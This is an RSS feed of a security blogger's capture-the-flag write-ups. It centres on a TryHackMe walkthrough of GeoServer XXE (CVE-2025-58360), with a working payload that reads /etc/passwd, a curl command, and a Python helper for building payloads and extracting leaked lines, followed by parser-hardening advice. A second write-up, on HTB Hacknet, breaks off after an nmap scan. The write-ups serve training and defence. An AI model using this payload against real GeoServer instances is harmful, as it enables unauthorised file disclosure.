<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Motasem Hamdan</title>
    <description>The latest articles on DEV Community by Motasem Hamdan (@motasem_hamdan_9c56098a7e).</description>
    <link>https://dev.to/motasem_hamdan_9c56098a7e</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3752887%2F89efe090-57c3-4486-a133-0f8df0dc6a02.jpg</url>
      <title>DEV Community: Motasem Hamdan</title>
      <link>https://dev.to/motasem_hamdan_9c56098a7e</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/motasem_hamdan_9c56098a7e"/>
    <language>en</language>
    <item>
      <title>TryHackMe GeoServer's XXE 2025 Walkthrough</title>
      <dc:creator>Motasem Hamdan</dc:creator>
      <pubDate>Fri, 06 Feb 2026 10:32:18 +0000</pubDate>
      <link>https://dev.to/motasem_hamdan_9c56098a7e/tryhackme-geoservers-xxe-2025-walkthrough-44ik</link>
      <guid>https://dev.to/motasem_hamdan_9c56098a7e/tryhackme-geoservers-xxe-2025-walkthrough-44ik</guid>
      <description>&lt;p&gt;In GeoServer CVE-2025-58360, we are dealing with an XML External Entity (XXE) vulnerability in 2025, a flaw that arguably should have been extinct a decade ago.&lt;/p&gt;

&lt;p&gt;The challenge forces you to stop thinking like a script kiddie looking for a Metasploit module and start thinking like a protocol auditor who understands that the standards defining the web (like OGC's WMS) are often the very vectors that betray it.&lt;/p&gt;

&lt;h3&gt;
  
  
  What This Vulnerability Really Tests
&lt;/h3&gt;

&lt;p&gt;At its core, it is a rigorous examination of your ability to manipulate &lt;strong&gt;Structured Data Protocols&lt;/strong&gt; beyond standard HTTP parameter fuzzing.&lt;/p&gt;

&lt;p&gt;It tests your competency in protocol switching: recognizing that while a Web Map Service (WMS) is typically queried via GET requests in a browser (e.g., &lt;code&gt;?request=GetMap&lt;/code&gt;), the OGC specification also defines an XML-encoded POST form of the same operations, and GeoServer implements it.&lt;/p&gt;

&lt;p&gt;This is where the vulnerability lives. The &lt;a href="https://tryhackme.com/room/geoservercve202558360?ref=the-mastermind-notes.ghost.io" rel="noopener noreferrer"&gt;room&lt;/a&gt; challenges you to identify that the application's XML parser is configured promiscuously, allowing Document Type Definitions (DTDs) to define external entities.&lt;/p&gt;

&lt;p&gt;It tests your ability to craft Out-of-Band or Error-Based data exfiltration payloads, verifying if you can trick a Java application into reading its own filesystem (&lt;code&gt;/etc/passwd&lt;/code&gt;) and spitting the content back at you in an error log. It is a test of white-box logic applied to a black-box endpoint.&lt;/p&gt;

&lt;h3&gt;
  
  
  Enumeration Methodology
&lt;/h3&gt;

&lt;p&gt;The standard directory-busting approach is functionally useless here because the endpoint &lt;code&gt;/geoserver/wms&lt;/code&gt; is already known or trivially discovered. What pays off is a method-swapping audit.&lt;/p&gt;

&lt;p&gt;When you encounter a RESTful or SOAP-like endpoint that behaves normally with GET requests, your immediate instinct must be to test its behavior with POST. You are looking for a Content-Type disparity: a form-encoded GET and an XML POST are usually handled by different request readers, and only the XML one invokes the parser you want to attack.&lt;/p&gt;

&lt;p&gt;In this specific case, you interact with the &lt;code&gt;GetMap&lt;/code&gt; operation. Standard enumeration involves capturing a legitimate GET request for a map layer (like &lt;code&gt;trymapme_offices&lt;/code&gt;) and converting it into its XML equivalent.&lt;/p&gt;

&lt;p&gt;You aren't just looking for a 200 OK; you are probing the parser.&lt;/p&gt;

&lt;p&gt;You send a minimal XML structure to see if the server accepts it. If it does, you inject a benign DTD (for example an internal entity &lt;code&gt;&amp;amp;test;&lt;/code&gt; declared with the value "hello") to see if the server resolves it. If "hello" appears in the error message or the rendered map label, the parser processes DTDs. That is not yet proof of XXE, because an internal entity never leaves the document. The confirmation is a &lt;code&gt;SYSTEM&lt;/code&gt; entity pointing at a local file: only once its content comes back (or an out-of-band request arrives at your listener) is the parser confirmed vulnerable.&lt;/p&gt;


&lt;div class="crayons-card c-embed text-styles text-styles--secondary"&gt;
    &lt;div class="c-embed__content"&gt;
        &lt;div class="c-embed__cover"&gt;
          &lt;a href="https://shop.motasem-notes.net/collections/cheat-sheets?ref=the-mastermind-notes.ghost.io" class="c-link align-middle" rel="noopener noreferrer"&gt;
            &lt;img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fimgproxy.fourthwall.com%2FI-VPuEyqgYNG1WitBRAEF3YcI0ixGCob3SnFkT1-U6E%2Fw%3A1200%2Fsm%3A1%2Fenc%2F29CzqoA7JMjatjEm%2FRL0x_h6GmqMmlRWU%2FREmVXVKVSon9YgGE%2Fzxehe2e32DVqKqDH%2Fm4-3foRcVfVR98u-%2FzQ17umnZ9AJ9IPsS%2FcR55xzGxCGlxApab%2Fh7HLWztqWe_Wg9Ct%2FDH3oCuafBp72DJ5n%2FeJe0qdcNqiAi5InM%2FSXy2g1ttTz1shUv6%2FpzLNuCBmRi5QPtRw%2FH5d_rKQJuyXxP3D4%2FmEpR1g" height="1600" class="m-0" width="1200"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="c-embed__body"&gt;
        &lt;h2 class="fs-xl lh-tight"&gt;
          &lt;a href="https://shop.motasem-notes.net/collections/cheat-sheets?ref=the-mastermind-notes.ghost.io" rel="noopener noreferrer" class="c-link"&gt;
            Cyber Security Notes &amp;amp; Cheat Sheets | The MasterMind Notes / Motasem Hamdan
          &lt;/a&gt;
        &lt;/h2&gt;
          &lt;p class="truncate-at-3"&gt;
            The official Cyber Security Notes &amp;amp; Cheat Sheets collection for The MasterMind Notes / Motasem Hamdan. Shop products like: The Ultimate CVE Timeline (2010–2026) Cheat Sheet, Cloud SOC Analyst Cheat Sheet | Log Analysis, and more.
          &lt;/p&gt;
        &lt;div class="color-secondary fs-s flex items-center"&gt;
            &lt;img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fimgproxy.fourthwall.com%2FFJqqpShALvXlMqWPo8tKb-LuD974ARrBgzxw_9OChZ4%2Fs%3A96%3A96%2Fsm%3A1%2Fenc%2FbE1WsNBEuZizd6l9%2FKw-Z-lFulBPL1GC5%2FgqPvpMWwKyKQS6BK%2FYXDsapRqLlrJyMew%2Fx4v8DUBDfFn88lvz%2FB8GWQKFUb75Z3BAP%2F9XcbYkA0cZciwG86%2FLPdkiQ1EjE8eC7FP%2F9x1PYgzk7rsXBEWp%2Fv65cQVflX20AgXOV%2FBDpNXcsN6nzs2sYU%2FcXB7cxvkmou3OEAt%2Fu_2AstgJmMfsg2Wv%2FGu8ZwRrbbzEeZSkg%2FHMB2D6KHCPJYicvB%2Fr1HiEVwR7gvQlZ-L" width="96" height="96"&gt;
          shop.motasem-notes.net
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;


&lt;h3&gt;
  
  
  Commands Cheat Sheet
&lt;/h3&gt;

&lt;p&gt;While the logic is paramount, having the precision syntax is critical for exploitation, especially when dealing with the strict XML formatting required by GeoServer.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Execution Command&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Use &lt;code&gt;curl&lt;/code&gt; to fire this XML at the WMS endpoint with the Content-Type set to &lt;code&gt;text/xml&lt;/code&gt; or &lt;code&gt;application/xml&lt;/code&gt;, so that GeoServer hands the body to its XML request reader instead of treating it as form data: &lt;code&gt;curl -X POST -H "Content-Type: application/xml" -d @payload.xml http://&amp;lt;TARGET_IP&amp;gt;/geoserver/wms&lt;/code&gt;. Add &lt;code&gt;-i&lt;/code&gt; if you want the status line and headers as well, and note that &lt;code&gt;-d @file&lt;/code&gt; strips newlines before sending; if your payload depends on them, use &lt;code&gt;--data-binary @payload.xml&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Error-Based XXE Payload:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This payload is an XML GetMap POST body that declares an external entity pointing at the target file. The entity reference &lt;code&gt;&amp;amp;xxe;&lt;/code&gt; goes into a field the server will process and then fail on (the style name), so the expanded content lands in the error message.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;!DOCTYPE foo [
  &amp;lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&amp;gt;
]&amp;gt;
&amp;lt;GetMap service="WMS" version="1.1.1"&amp;gt;
  &amp;lt;StyledLayerDescriptor version="1.0.0"&amp;gt;
    &amp;lt;UserLayer&amp;gt;
      &amp;lt;Name&amp;gt;trymapme_offices&amp;lt;/Name&amp;gt;
      &amp;lt;UserStyle&amp;gt;
        &amp;lt;Name&amp;gt;&amp;amp;xxe;&amp;lt;/Name&amp;gt;
        &amp;lt;FeatureTypeStyle&amp;gt;
          &amp;lt;Rule&amp;gt;
            &amp;lt;PointSymbolizer/&amp;gt;
          &amp;lt;/Rule&amp;gt;
        &amp;lt;/FeatureTypeStyle&amp;gt;
      &amp;lt;/UserStyle&amp;gt;
    &amp;lt;/UserLayer&amp;gt;
  &amp;lt;/StyledLayerDescriptor&amp;gt;
&amp;lt;/GetMap&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
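&lt;p&gt;The probe-then-exfiltrate sequence described in the enumeration section and the payload above, as an added example that is not part of the original walkthrough or of GeoServer: a Python helper that lifts the layer name from a captured GetMap GET request, emits the internal-entity probe and the SYSTEM-entity payload inside the same GetMap/SLD wrapper, and pulls passwd-shaped lines out of a WMS ServiceExceptionReport. The sample response embedded at the bottom is constructed for the demo and its message wording is illustrative, not GeoServer's exact text; sending the body is left to curl or Burp as described.&lt;/p&gt;

```python
"""Added example (not from the room or from GeoServer): build the GetMap POST
bodies for the probe and the file read, and extract leaked content from the
WMS error response. Sending is left to curl or Burp."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Same wrapper as the payload above; {dtd} is empty for a plain request,
# an internal entity for the probe, a SYSTEM entity for the file read.
GETMAP_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
{dtd}<GetMap service="WMS" version="1.1.1">
  <StyledLayerDescriptor version="1.0.0">
    <UserLayer>
      <Name>{layer}</Name>
      <UserStyle>
        <Name>{style}</Name>
        <FeatureTypeStyle><Rule><PointSymbolizer/></Rule></FeatureTypeStyle>
      </UserStyle>
    </UserLayer>
  </StyledLayerDescriptor>
</GetMap>
"""


def layer_from_get(url):
    """Lift the LAYERS value out of a captured GetMap GET request.
    WMS parameter names are case-insensitive, so compare lower-cased."""
    for key, values in parse_qs(urlsplit(url).query).items():
        if key.lower() == "layers":
            return values[0]
    raise ValueError("no LAYERS parameter in request")


def probe_body(layer):
    """Step 1: internal entity only. 'hello' in the response means the parser
    processes DTDs; it does not yet prove external entities are fetched."""
    dtd = '<!DOCTYPE foo [ <!ENTITY test "hello"> ]>\n'
    return GETMAP_TEMPLATE.format(dtd=dtd, layer=layer, style="&test;")


def xxe_body(layer, target="file:///etc/passwd"):
    """Step 2: external entity; the style name is the field that fails loudly."""
    dtd = '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "%s"> ]>\n' % target
    return GETMAP_TEMPLATE.format(dtd=dtd, layer=layer, style="&xxe;")


# name:passwd:uid:gid:gecos:home:shell, wherever it sits inside a message
PASSWD_LINE = re.compile(
    r"[A-Za-z_][A-Za-z0-9_-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^\n]*"
)


def exception_messages(response_xml):
    """Texts of every ServiceException in a WMS 1.1.1 ServiceExceptionReport.
    ElementTree never fetches the external DTD the report declares."""
    root = ET.fromstring(response_xml)
    return [(el.text or "").strip() for el in root.iter("ServiceException")]


def leaked_passwd_lines(response_xml):
    """Passwd-shaped lines found in the error messages, in document order."""
    found = []
    for message in exception_messages(response_xml):
        found.extend(PASSWD_LINE.findall(message))
    return found


# Constructed sample response for the demo: shaped like a WMS 1.1.1
# ServiceExceptionReport, but the message wording is illustrative.
SAMPLE_RESPONSE = """<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE ServiceExceptionReport SYSTEM "http://schemas.opengis.net/wms/1.1.1/WMS_exception_1_1_1.dtd">
<ServiceExceptionReport version="1.1.1">
  <ServiceException>
    Style not found: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
geoserver:x:1000:1000::/home/geoserver:/bin/bash
  </ServiceException>
</ServiceExceptionReport>
"""

if __name__ == "__main__":
    layer = layer_from_get("http://10.10.10.10/geoserver/wms?SERVICE=WMS&REQUEST=GetMap&LAYERS=trymapme_offices")
    print(xxe_body(layer))
    for line in leaked_passwd_lines(SAMPLE_RESPONSE):
        print("leaked:", line)
```

&lt;p&gt;Two things worth noting. The probe uses an internal entity on purpose: it tells you the DTD is processed without touching the filesystem, so it is the right first request on a production engagement. And the extractor parses the error report with ElementTree, which never resolves external entities or fetches the DTD the report declares, so reading a hostile response does not turn your own tooling into the next XXE victim.&lt;/p&gt;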

&lt;h3&gt;
  
  
  Common Mistakes
&lt;/h3&gt;

&lt;p&gt;The most damaging mistake on this box is &lt;strong&gt;protocol rigidity&lt;/strong&gt;. Testers often try to inject the XXE payload into the URL parameters of a GET request, which fails because the vulnerable code path is triggered only when the XML parser is invoked on the request body. Another common mistake is &lt;strong&gt;ignoring the error response&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;In this specific CVE, the data exfiltration happens via verbose error messages. If you are expecting the &lt;code&gt;/etc/passwd&lt;/code&gt; file to be rendered into the map image, you will be disappointed.&lt;/p&gt;

&lt;p&gt;You must read the HTTP response body (the XML error, a WMS &lt;code&gt;ServiceExceptionReport&lt;/code&gt;) to find the leaked text. Finally, many testers fail to structure the OGC-compliant XML wrapper (&lt;code&gt;GetMap&lt;/code&gt;, &lt;code&gt;StyledLayerDescriptor&lt;/code&gt;) properly, so the server rejects the request as malformed before it ever reaches the entity reference.&lt;/p&gt;
&lt;h3&gt;
  
  
  Tool Usage Patterns
&lt;/h3&gt;

&lt;p&gt;This environment demands a surgical approach to tooling. &lt;strong&gt;Burp Suite Professional&lt;/strong&gt; (or Community) is essential, particularly the &lt;strong&gt;Repeater&lt;/strong&gt; tab, as it allows you to rapidly iterate on the XML structure and view the raw response headers and body.&lt;/p&gt;

&lt;p&gt;You will be heavily relying on the Send to Repeater workflow. However, for the initial discovery or if you are working from a headless AttackBox, &lt;code&gt;curl&lt;/code&gt; is your scalpel. You need to become comfortable using &lt;code&gt;curl&lt;/code&gt; with the &lt;code&gt;-d @filename&lt;/code&gt; flag to send clean, pre-formatted XML files, avoiding the escaping hell of trying to put XML into a command-line string.&lt;/p&gt;

&lt;p&gt;Automated scanners like SQLMap are useless here; this is a parser configuration flaw, not a database injection (though the workflow of probe, confirm and extract feels similar).&lt;/p&gt;
&lt;h3&gt;
  
  
  Security Lesson &amp;amp; Mitigation
&lt;/h3&gt;

&lt;p&gt;The primary lesson from CVE-2025-58360 is that &lt;strong&gt;default configurations are often insecure&lt;/strong&gt;. GeoServer vulnerabilities frequently arise because the underlying XML parsers (often provided by Java libraries) have external entity resolution enabled by default.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mitigation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The fix is rarely in the code logic but in the parser configuration. Developers must explicitly &lt;strong&gt;disable DTD processing&lt;/strong&gt; in their &lt;code&gt;DocumentBuilderFactory&lt;/code&gt; (and &lt;code&gt;SAXParserFactory&lt;/code&gt; or &lt;code&gt;XMLInputFactory&lt;/code&gt;) settings with &lt;code&gt;setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)&lt;/code&gt;. Where a DOCTYPE must be tolerated because legitimate clients send one, the fallback is to keep the DTD but neuter it: set &lt;code&gt;http://xml.org/sax/features/external-general-entities&lt;/code&gt; and &lt;code&gt;http://xml.org/sax/features/external-parameter-entities&lt;/code&gt; to false and call &lt;code&gt;setExpandEntityReferences(false)&lt;/code&gt;. Either way the acceptance check is the same: replay the payload above against the patched build and confirm the response no longer carries the file content.&lt;/p&gt;
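&lt;p&gt;The three parser configurations in play, as an added example that is not GeoServer's code: GeoServer is Java and the Xerces feature names above are what you would set there, but the mechanics are identical in any DTD-aware parser, so this reproduces them with Python's standard-library expat, which runs anywhere. The secret file is a constructed stand-in written to a temporary path; nothing real is read.&lt;/p&gt;

```python
"""Added example: the XXE misconfiguration class reproduced with Python's
stdlib expat, beside the two fixes named above. Not GeoServer's code; the
Java feature names are in the text, the mechanics are the same here."""
import os
import tempfile
import xml.parsers.expat as expat
from urllib.parse import urlparse


def parse_text(xml_doc, resolve_external=False, allow_doctype=True):
    """Parse a document and return its concatenated character data.

    resolve_external=True installs a resolver that fetches file:// entities,
    which is what a parser with external-general-entities enabled does.
    allow_doctype=False rejects any DOCTYPE: the disallow-doctype-decl fix.
    """
    chunks = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = chunks.append

    if not allow_doctype:
        def reject_doctype(name, sysid, pubid, has_internal_subset):
            raise ValueError("DOCTYPE declarations are not allowed")
        parser.StartDoctypeDeclHandler = reject_doctype

    if resolve_external:
        def fetch_entity(context, base, system_id, public_id):
            url = urlparse(system_id)
            if url.scheme != "file":   # demo stays local; a real resolver does http(s) too
                return 0
            with open(url.path, "rb") as fh:
                body = fh.read()
            child = parser.ExternalEntityParserCreate(context)
            child.Parse(body, True)    # entity text flows into the parent's handlers
            return 1
        parser.ExternalEntityRefHandler = fetch_entity

    parser.Parse(xml_doc, True)
    return "".join(chunks)


def xxe_document(target_url):
    """Minimal form of the payload above: the entity expands inside Name."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
        '<UserStyle><Name>&xxe;</Name></UserStyle>\n' % target_url
    )


SAMPLE_SECRET = "root:x:0:0:root:/root:/bin/bash\n"   # constructed stand-in for /etc/passwd


def run_demo():
    """Run one payload through three parser configurations.
    Returns (leak_with_resolver, leak_without_resolver, hardened_error)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(SAMPLE_SECRET)
        path = fh.name
    try:
        doc = xxe_document("file://" + path)
        leaked = parse_text(doc, resolve_external=True)       # vulnerable
        unresolved = parse_text(doc, resolve_external=False)  # entities not fetched
        try:
            parse_text(doc, allow_doctype=False)              # DOCTYPE refused outright
            hardened_error = None
        except ValueError as exc:
            hardened_error = str(exc)
    finally:
        os.unlink(path)
    return leaked, unresolved, hardened_error


if __name__ == "__main__":
    leaked, unresolved, hardened_error = run_demo()
    print("vulnerable parser leaked:", repr(leaked))
    print("external entities off   :", repr(unresolved))
    print("DOCTYPE rejected        :", hardened_error)
```

&lt;p&gt;The middle configuration (DOCTYPE allowed, external entities not resolved) is the one to reach for when legitimate clients send a DOCTYPE and you cannot reject it outright; the last one is the stronger default. Note that the vulnerable variant is only vulnerable because the resolver fetches whatever URL the document names, which is exactly what a default JAXP parser does on the application's behalf without any resolver being written.&lt;/p&gt;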

&lt;p&gt;&lt;strong&gt;Infrastructure Defense&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;At the network level, egress filtering is critical. If the XXE were blind (no error output), the attacker would instead make the server call out to a machine they control, either to fetch a malicious external DTD or to carry the file content in the request URL. Blocking the server from initiating outbound connections to the internet, or to internal subnets it has no business reaching, neuters that out-of-band channel and the SSRF component of this attack.&lt;/p&gt;


&lt;div class="crayons-card c-embed text-styles text-styles--secondary"&gt;
    &lt;div class="c-embed__content"&gt;
        &lt;div class="c-embed__cover"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/e/388076?ref=the-mastermind-notes.ghost.io" class="c-link align-middle" rel="noopener noreferrer"&gt;
            &lt;img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fimg.buymeacoffee.com%2Fapi%2F%3Fextras%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%3D" height="601" class="m-0" width="1201"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="c-embed__body"&gt;
        &lt;h2 class="fs-xl lh-tight"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/e/388076?ref=the-mastermind-notes.ghost.io" rel="noopener noreferrer" class="c-link"&gt;
            TryHackMe SAL1 Study Notes &amp;amp;amp; Guide (Unofficial) - Buymeacoffee
          &lt;/a&gt;
        &lt;/h2&gt;
          &lt;p class="truncate-at-3"&gt;
            TryHackMe SAL1 Study Notes is designed as a comprehensive guide for cybersecurity beginners and those preparing for the TryHackMe SAL1 exam. It provides structured study materials covering security fo
          &lt;/p&gt;
        &lt;div class="color-secondary fs-s flex items-center"&gt;
            &lt;img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.buymeacoffee.com%2Fuploads%2Fprofile_pictures%2F2024%2F08%2FZM833oVaI4yezrXw.png%401f.png" width="200" height="200"&gt;
          buymeacoffee.com
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;



&lt;h3&gt;
  
  
  Expert Hints
&lt;/h3&gt;

&lt;p&gt;If you are investigating the logs to answer the room's questions, pay close attention to the &lt;strong&gt;&lt;code&gt;geoserver_app.log&lt;/code&gt;&lt;/strong&gt;. The vulnerability is "noisy." When the attacker (or you) forces the server to read a file that isn't a valid style descriptor, the server throws an exception.&lt;/p&gt;

&lt;p&gt;That exception contains the content of the file it tried to parse. Look for stack traces that contain strings such as &lt;code&gt;root:x:0:0&lt;/code&gt;; that is your stolen password file. Also remember that the flag might not be in a standard text file: the attacker might have used the XXE to list directories (Java's &lt;code&gt;file://&lt;/code&gt; handler returns a listing when the URL names a directory) or to read application config files to find it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Certifications Prep Suggestions
&lt;/h3&gt;

&lt;p&gt;This machine is an ideal training ground for intermediate-to-advanced certifications that require manual web application exploitation:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://buymeacoffee.com/notescatalog/e/504571?ref=the-mastermind-notes.ghost.io" rel="noopener noreferrer"&gt;&lt;strong&gt;OSWE (OffSec Web Expert)&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;:&lt;/strong&gt; The requirement to construct a valid XML payload based on reading documentation (OGC standards) and then exploiting it is the core of the OSWE exam.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://buymeacoffee.com/notescatalog/e/234031?ref=the-mastermind-notes.ghost.io" rel="noopener noreferrer"&gt;&lt;strong&gt;BSCP (Burp Suite Certified Practitioner)&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;:&lt;/strong&gt; This is a textbook example of "XML External Entity injection," a category that frequently appears in the BSCP exam's mystery labs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;eWPTX (eLearnSecurity Web Penetration Tester eXtreme):&lt;/strong&gt; The need to pivot from a known service (WMS) to an exploitation vector fits perfectly with the eWPTX syllabus.&lt;/p&gt;

&lt;p&gt; &lt;strong&gt;Join the Cyber Security Notes Membership:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;
&lt;div class="crayons-card c-embed text-styles text-styles--secondary"&gt;
    &lt;div class="c-embed__content"&gt;
        &lt;div class="c-embed__cover"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/membership?ref=the-mastermind-notes.ghost.io" class="c-link align-middle" rel="noopener noreferrer"&gt;
            &lt;img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.buymeacoffee.com%2Fopengraph%2Fimages%2F1730588%2F1%2Fog_9630827_1765478408.jpg" height="450" class="m-0" width="800"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="c-embed__body"&gt;
        &lt;h2 class="fs-xl lh-tight"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/membership?ref=the-mastermind-notes.ghost.io" rel="noopener noreferrer" class="c-link"&gt;
            Membership | The MasterMinds Notes - Buymeacoffee
          &lt;/a&gt;
        &lt;/h2&gt;
          &lt;p class="truncate-at-3"&gt;
            AboutCyber Security Notes &amp;amp;amp; CoursesContactconsultation@motasem-notes.netProduct's Legal &amp;amp;amp; TOS InfoPlease read all terms of service and legal information about the products from hereReviews and
          &lt;/p&gt;
        &lt;div class="color-secondary fs-s flex items-center"&gt;
            &lt;img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.buymeacoffee.com%2Fuploads%2Fprofile_pictures%2F2024%2F08%2FZM833oVaI4yezrXw.png%401f.png" width="200" height="200"&gt;
          buymeacoffee.com
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;


&lt;h3&gt;
  
  
  TryHackMe Room Answers
&lt;/h3&gt;

&lt;p&gt;Room answers can be &lt;a href="https://motasem-notes.net/geoserver-cve-2025-58360-tryhackme-walkthrough/?ref=the-mastermind-notes.ghost.io" rel="noopener noreferrer"&gt;found here&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>SSTI Explained: HTB Hacknet Writeup</title>
      <dc:creator>Motasem Hamdan</dc:creator>
      <pubDate>Wed, 04 Feb 2026 18:20:57 +0000</pubDate>
      <link>https://dev.to/motasem_hamdan_9c56098a7e/ssti-explained-htb-hacknet-writeup-5gd</link>
      <guid>https://dev.to/motasem_hamdan_9c56098a7e/ssti-explained-htb-hacknet-writeup-5gd</guid>
      <description>&lt;p&gt;Welcome to HTB &lt;strong&gt;Hacknet&lt;/strong&gt;, a Hard-difficulty machine on Hack The Box that tests your ability to read the developer’s mind. This is a masterclass in &lt;strong&gt;Framework Exploitation&lt;/strong&gt; and &lt;strong&gt;Insecure Deserialization&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;In this detailed breakdown, we dissect an attack chain that starts with a Python web framework blindly trusting user input and ends with a race condition in a root-privileged maintenance script.&lt;/p&gt;

&lt;p&gt;We will explore how to traverse internal objects to leak data without SQL, how to weaponize Python serialization, and why standard automated scanners will leave you empty-handed on this box.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 1: Behavioral Reconnaissance
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://motasem-notes.net/server-side-template-injection-explained-htb-hacknet-walkthrough/" rel="noopener noreferrer"&gt;Hacknet&lt;/a&gt; demands a departure from the loud and proud automated scanning methodology. While Nmap gives us the coordinates, the entry point is hidden in the application logic.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo nmap -p- -sS -T4 -Pn --min-rate 2000 10.10.11.85
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;strong&gt;Expert Insight:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Automated directory busters often fail here because the vulnerability is a hidden behavior.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;

&lt;/p&gt;
&lt;div class="crayons-card c-embed text-styles text-styles--secondary"&gt;
    &lt;div class="c-embed__content"&gt;
        &lt;div class="c-embed__cover"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/e/321854" class="c-link align-middle" rel="noopener noreferrer"&gt;
            &lt;img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fimg.buymeacoffee.com%2Fapi%2F%3Fextras%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" height="auto" class="m-0"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="c-embed__body"&gt;
        &lt;h2 class="fs-xl lh-tight"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/e/321854" rel="noopener noreferrer" class="c-link"&gt;
            HackTheBox Certified Penetration Testing Specialist (CPTS) Study Notes | 2026 Edition + FREE CHEAT SHEET - Buymeacoffee
          &lt;/a&gt;
        &lt;/h2&gt;
          &lt;p class="truncate-at-3"&gt;
            The HackTheBox CPTS Study Notes V8 are an 856-page PDF guide updated to meet the changes performed on the exam in 2026. They are designed to help candidates prepare for the Hack The Box Certified Pene
          &lt;/p&gt;
        &lt;div class="color-secondary fs-s flex items-center"&gt;
            &lt;img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.buymeacoffee.com%2Fuploads%2Fprofile_pictures%2F2024%2F08%2FZM833oVaI4yezrXw.png%401f.png"&gt;
          buymeacoffee.com
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;





&lt;h3&gt;
  
  
  Phase 2: Server-Side Template Injection
&lt;/h3&gt;

